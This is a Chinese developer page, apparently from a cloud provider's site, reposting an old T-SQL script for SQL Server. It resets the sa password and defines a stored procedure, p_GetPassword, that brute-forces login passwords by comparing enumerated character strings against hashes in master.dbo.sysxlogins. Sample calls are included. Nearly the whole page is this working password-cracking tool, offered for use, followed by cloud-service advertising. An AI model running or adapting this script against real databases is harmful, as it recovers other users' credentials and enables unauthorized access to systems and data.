首頁 > 開發者 > SQL Server
/*--密碼修改*/
/*--
exec sp_password null,'aa',sa --將sa的密碼設定為aaa,不管舊密碼是什麼
--檢查某個密碼是否為正確的密碼
declare @a varchar(20)
set @a='aaa'
select pwdcompare(@a, password,case xstatus&2048 when 2048 then 1 else 0 end) a
,name
from master.dbo.sysxlogins
declare @pwd varchar(100)
set @pwd=char(0)+char(255) --也只有兩位
select pwdcompare(@pwd, password,
(CASE WHEN xstatus&2048 = 2048 THEN 1 ELSE 0 END)) a
,name,password
from master.dbo.sysxlogins
--*/
-------------------------------------------------------------------------
/*=====================================================================*/
-------------------------------------------------------------------------
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO
/*--窮舉法破解 SQL Server 使用者密碼
可以破解中文,特殊字元,字元+尾隨空格的密碼
為了方便顯示特殊字元的密碼,在顯示結果中,顯示了組成密碼的ASCII
理論上可以破解任意位元的密碼,一般的電腦都可以破解3位密碼
條件是你的電腦配置足夠,時間足夠
--鄒建 2004.08(引用請保留此資訊)--*/
/*--調用樣本
--測試特殊字元
declare @pwd sysname
set @pwd=char(0)+'a '
exec sp_password null,@pwd,'sa'
exec p_GetPassword
--測試帶空格的密碼
exec sp_password null,'a ','sa'
exec p_GetPassword
--測試中文
exec sp_password null,'我 ','sa'
exec p_GetPassword
--清除密碼
exec sp_password null,null,'sa'
--*/
create proc p_GetPassword
@username sysname=null,--使用者名稱,如果不指定,則列出所有使用者
@pwdlen int=3--密碼破解的位元,預設只破解3位及以下的密碼
as
--產生要破解的密碼的使用者表
select name,password
,type=case when xstatus&2048=2048 then 1 else 0 end
,jm=case when password is null or datalength(password)<46
then 1 else 0 end
,pwdstr=case when datalength(password)<46
then cast(password as sysname)
else cast('' as sysname) end
,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)
--產生暫存資料表
select top 255 id=identity(int,0,1) into #t from sysobjects a,sysobjects b
alter table #t add constraint PK_#t primary key(id)
--清理不需要的字元
if not exists(select 1 from #pwd where type=1)
delete from #t where id between 65 and 90 or id between 129 and 254
--密碼破解處理
declare @l int
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@s4 varchar(8000)
--破解1位密碼
select @l=0
,@s1='id=a.id'
,@s2='#t a'
,@s3='char(b.id)'
,@s4='cast(b.id as varchar)'
exec('
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#t b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
--破解超過2位的密碼
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen-1)
begin
select @l=@l+1
,@s1=@s1+',id'+cast(@l as varchar)
+'='+char(@l/26+97)+char(@l%26+97)+'.id'
,@s2=@s2+',#t '+char(@l/26+97)+char(@l%26+97)
,@s3=@s3+'+char(b.id'+cast(@l as varchar)+')'
,@s4=@s4+'+'',''+cast(b.id'+cast(@l as varchar)+' as varchar)'
exec('
select '+@s1+' into #tt from '+@s2+'
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#tt b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
end
--顯示破解的密碼
select 使用者名稱=name,密碼=pwdstr,密碼ASCII=pwd
from #pwd
go
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
